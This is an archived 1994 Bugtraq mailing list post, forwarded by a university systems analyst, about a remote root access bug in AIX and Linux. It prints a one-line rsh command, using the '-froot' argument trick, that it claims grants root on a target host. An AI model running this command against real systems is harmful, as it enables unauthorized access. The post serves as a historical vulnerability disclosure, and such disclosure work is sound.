Bugtraq mailing list archives

Fun! (fwd)

From: pug () arlut utexas edu (Pug)
Date: Sat, 21 May 1994 07:39:32 -0500 (CDT)

      Shhh, This is not directly related to WWW, but this is so huge,
      I thought I would share it with everyone:
      rsh hostname -l -froot

      where hostname is an AIX or Linux box will gain you root access to
      that machine.

      Sorry to help fill your mailbox but I thought I would let you know.

This ended up in my mail box. It looks to be the bug everyone is looking
for.

Ciao,

--
Richard Bainter          Mundanely     |    System Analyst        - OMG/CSD
Pug                      Generally     |    Applied Research Labs - U.Texas